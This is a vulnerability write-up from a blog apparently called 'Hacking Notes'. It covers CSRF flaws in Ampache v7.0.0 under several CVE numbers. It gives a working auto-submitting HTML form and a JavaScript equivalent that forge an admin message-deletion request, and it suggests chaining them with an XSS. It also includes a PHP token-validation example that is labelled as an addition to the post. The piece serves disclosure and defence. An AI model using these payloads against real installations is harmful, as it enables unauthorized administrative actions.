CVE-2024-51489, CVE-2024-51488, CVE-2024-51485, CVE-2024-51484, CVE-2024-51487 | Ampache v7.0.0 XSS | Inadequate Cross-Site Request Forgery (CSRF) token validation

Hacking Notes
Nov 1, 2024

Introduction to CVE-2024-51489, CVE-2024-51488, CVE-2024-51485, CVE-2024-51484, CVE-2024-51487

CVE-2024-51489, CVE-2024-51488, CVE-2024-51485, CVE-2024-51484, and CVE-2024-51487 highlight several security vulnerabilities within the application that jeopardize user data integrity and availability. Specifically, inadequate validation of Cross-Site Request Forgery (CSRF) tokens enables an attacker to execute unauthorized requests on behalf of a user who inadvertently visits a malicious website. This vulnerability could allow an attacker to send messages on behalf of the administrator and enable or disable multiple website features that are typically restricted to admin control.

What is Ampache

Ampache is an advanced web-based media streaming application designed to manage and play audio and video files online. It empowers users to organize, access, and stream their media collections from anywhere, making it a versatile tool for music and video enthusiasts.

The platform features a user-friendly interface that allows users to easily upload and manage their media without requiring extensive technical skills, making it accessible to a wide audience. Additionally, Ampache supports multiple platforms, enabling users to stream their media on various devices, including computers, smartphones, and tablets, which significantly enhances accessibility.

One of Ampache’s standout features is its ability to stream high-quality audio and video in real time, ensuring an enjoyable user experience. It also offers integration with various tools and services, providing flexibility in how users can manage and play their media. As an open-source project, Ampache allows users to customize the software to meet their specific needs, further increasing its utility.

Developed by a dedicated community of contributors, Ampache has grown into a robust platform that continues to evolve. Its extensive capabilities and ongoing development are a testament to the commitment of its community, making it a remarkable achievement in the realm of media streaming solutions.

Exploitation Phase

Now that you understand what Ampache is, let’s delve deeper into the specifics of these CVEs and explore how an attacker might exploit them. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to perform unauthorized actions.

Simple Exploitation

To exploit this Cross-Site Request Forgery (CSRF) vulnerability, an attacker would typically create a form on their malicious website. When an administrator visits this page, the form would automatically submit a request, thereby executing the CSRF attack.

<html>
<body>
<form action="https://ampache/pvmsg.php?action=confirm_delete&msgs=123" method="POST">
<input type="hidden" name="form_validation" value="Inadequate-token-validation" />
<input type="submit" value="Submit request" />
<script>
document.forms[0].submit();
</script>
</form>
</body>
</html>

Attacker Scenario Exploiting the Vulnerability

In this particular case, we face an issue where cookies are not included in the request, likely due to restrictions that prevent them from being sent cross-site. To effectively exploit this CSRF vulnerability, you can utilize an existing Cross-Site Scripting (XSS) vulnerability, such as the one identified in CVE #1–3. This approach allows you to bypass the cookie restrictions, as the exploit will occur within the same site.

const form = document.createElement('form');
form.action = 'https://ampache/pvmsg.php?action=confirm_delete&msgs=123';
form.method = 'POST';

const hiddenInput = document.createElement('input');
hiddenInput.type = 'hidden';
hiddenInput.name = 'form_validation';
hiddenInput.value = 'Inadequate-token-validation';

form.appendChild(hiddenInput);
document.body.appendChild(form);
form.submit();
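
A server-side check that would reject the forged form_validation value used in both requests above, as an added example that is not from the original post and not Ampache's own code. The function names, the session layout, the 'pvmsg_delete' form label and the 15-minute lifetime are assumptions.

```php
<?php
// Added example, not Ampache's code. Names and session layout are assumptions.
const CSRF_TTL = 900; // assumed token lifetime in seconds

// Create a random token bound to one session and one form, stored server-side.
function csrf_issue(array &$session, string $form): string
{
    $token = bin2hex(random_bytes(32));
    $session['csrf'][$form] = ['token' => $token, 'expires' => time() + CSRF_TTL];
    return $token;
}

// Accept only the exact token issued to this session for this form, once.
function csrf_check(array &$session, string $form, $submitted): bool
{
    $entry = $session['csrf'][$form] ?? null;
    if (!is_array($entry) || !is_string($submitted) || $submitted === '') {
        return false; // nothing issued, field missing, or array-typed input
    }
    if ($entry['expires'] < time()) {
        unset($session['csrf'][$form]);
        return false; // expired
    }
    if (!hash_equals($entry['token'], $submitted)) {
        return false; // constant-time mismatch: arbitrary strings end here
    }
    unset($session['csrf'][$form]); // single use
    return true;
}

// Constructed demo: a plain array stands in for $_SESSION, and each
// value stands in for $_POST['form_validation'].
$session = [];
$issued  = csrf_issue($session, 'pvmsg_delete');
$cases = [
    'forged value from the page' => 'Inadequate-token-validation',
    'field missing'              => null,
    'array-typed field'          => ['x'],
    'token issued to session'    => $issued,
    'same token replayed'        => $issued,
];
foreach ($cases as $label => $value) {
    $ok = csrf_check($session, 'pvmsg_delete', $value);
    printf("%-28s %s\n", $label, $ok ? 'accepted' : 'rejected');
}
```

This check does not stop the same-site variant above, because script running inside an Ampache page can read a valid token from the form; that path closes only when the XSS itself is fixed.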

Other References

For the latest updates on my developments and research, be sure to check out my GitHub profile.
